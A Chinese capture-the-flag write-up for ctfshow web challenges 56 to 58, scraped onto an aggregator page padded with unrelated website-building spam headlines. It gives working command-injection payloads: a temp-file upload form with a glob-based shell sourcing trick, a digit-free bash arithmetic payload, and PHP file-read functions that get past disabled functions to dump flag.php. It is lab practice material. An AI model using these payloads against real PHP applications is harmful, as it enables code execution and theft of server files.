当前位置: 首页 > news >正文

海南做网站找谁继续加强网站建设

news 2025/9/18 10:26:35
海南做网站找谁,继续加强网站建设,网站构建建设制作平台,微信公众号文章推广目录 1、web56 2、web57 3、web58 1、web56 命令执行&#xff0c;需要严格的过滤 新增过滤数字&#xff0c;只能采用上一题临时文件上传的方法&#xff1a; <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><…

目录

1、web56 

2、web57

3、web58

1、web56 

命令执行,需要严格的过滤

新增过滤数字,只能采用上一题临时文件上传的方法:

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>POST数据包POC</title>
</head>
<body>
<form action="https://f135ee89-cbf7-464b-9e19-a07aec56fd3f.challenge.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接--><label for="file">文件名:</label><input type="file" name="file" id="file"><br><input type="submit" name="submit" value="提交">
</form>
</body>
</html>

payload:?c=.%20/???/????????[@-[] 

2、web57

命令执行,需要严格的过滤,已测试,可绕

先说两个东西,在 Linux 下:

$(())=0
$((~ $(()) ))=-1

这里说了 flag 在 36.php,那么我们只需要构造 36,但是数字被过滤了。

由于前面说的只有 -1,因此我们对 36 进行取反,得到 -37,对 -37 再次取反即可得到 36。

根据 $((~ $(()) ))=-1,我们进行拼接,构造出 -37

$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))

再对其进行取反得到 36

$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

构造 payload:

?c=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

拿到 flag:ctfshow{37b0df2c-1256-4779-93e8-715022cb9673}

3、web58

命令执行,突破禁用函数

调用 system 函数,发现函数被禁用

这里使用 show_source 或者 highlight_file,构造 payload:

c=show_source('flag.php');
c=highlight_file('flag.php');

拿到 flag:ctfshow{7d992144-9afa-434e-a610-5af9bc9e1600}

也可以直接将 php 代码传给 eval 函数让其执行,构造 payload:

c=include("php://filter/convert.iconv.utf8.utf16/resource=flag.php");

还在网上还看到了很多其他奇思妙想的解法,格局一下就打开了

(1)利用 copy 函数

c=copy("flag.php","flag.txt");

执行后直接访问 flag.txt

(2)rename 函数

通过将 flag.php 重命名为 txt 文件,之后直接访问读取,和上面的 copy 差不多

(3)file_get_contents 函数

使用 file_get_contents 进行读取,再配合 echo 输出,payload:

c=echo file_get_contents("flag.php");

(4)readfile 函数

payload:

c=readfile("flag.php");

 

(5) file 函数

payload:

c=print_r(file("flag.php"));

更多其他情况和方法可以参考羽师傅的博客 

http://www.yayakq.cn/news/928785/

相关文章:

  • 无锡网站制作的公司有哪些卖域名赚钱吗
  • 南京网站建设开发河南公司网站制作咨询
  • 可以做任务挣钱的网站四网一体网站建设方案
  • 网站用哪些系统做的比较好直播软件有哪些平台
  • 关于免费制作网页的网站深圳网站和app建设
  • 网站服务器租用你的知识宝库drupal 网站开发
  • 市桥网站建设培训学校网页网页设计班
  • 网站加网页做二手网站
  • 公司网站制作要多少钱朋友圈转wordpress文章显示缩略图
  • 官网站内优化怎么做 2018wordpress插件怎么破解
  • 订阅号可以做网站么网站建设上市公司
  • seo网站推广作用邯郸二手房出售信息
  • 网站和网页不同吗企业信息系统包括
  • 手机版网站如何建设国家住建网查企业资质
  • 一个公司做几个网站网站logo替换
  • 广东响应式网站杭州网站建设商业
  • 装饰公司怎么做网站公司展示型网站
  • 广安 网站建设自己怎么制作图片
  • 网站导航二级菜单怎么做出来的公司装修效果图办公室
  • 汽车网站制作模板大型网站 网站建设
  • 武安网站制作淮安网站建设哪家好
  • 大会的网站架构如何推广外贸型网站
  • 网站开发 合同范本移动端开发需要学什么
  • 江西住房和城乡建设部网站首页中国央企100强排名
  • 龙华个人网站建设seop
  • 建域名网站需要多少钱天津平台网站建设哪家好
  • 常州哪家网站建设公司专业静态摄影网站模板
  • 深圳找工作哪个网站好网页设计常见的布局形式
  • 网站建设实训分析总结网站管理系统制作
  • 网站智能建设有那些优势零下一度网站建设